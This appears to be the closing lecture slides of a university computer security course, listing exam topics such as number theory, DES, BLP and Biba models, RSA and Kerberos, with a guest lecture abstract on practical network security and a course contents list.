• Information
• Models
• Key systems
Exam
Modulo, primes, Fermat, Euler: general & specific
Symmetric cryptosystems: IC, DES, general & specific
Physical limits: general
Information theory: general & security-specific
Models: BLP, Biba - general & specific
Key systems: RSA, Kerberos, specific
Dr Robert Deng
Real World Applications of Network/Computer Security
Abstract: The lecture is on practical applications of network and computer security technology. Examples include virtual private networks, security solutions for e-banking, fair exchange of digital valuables over the Internet (e.g., electronic contract signing over a network and certified e-mail delivery) and techniques for user privacy protection in cyberspace.
Finally
This is my last lecture, so...
Good luck with the exam, and
Thanks for your attention
Good luck!
Contents
1 Lecture 1 - Introduction
2 Lecture 2 - Preliminaries
3 Lecture 3 - Preliminaries
4 Lecture 4 - Preliminaries
5 Lecture 5 - Preliminaries
6 Lecture 6 - Errors
7 Lecture 7 - Encryption
8 Lecture 8 - Protocols
9 Lecture 9 - System (in)security
10 Lecture 10 - More (in)security
11 Lecture 11 - Security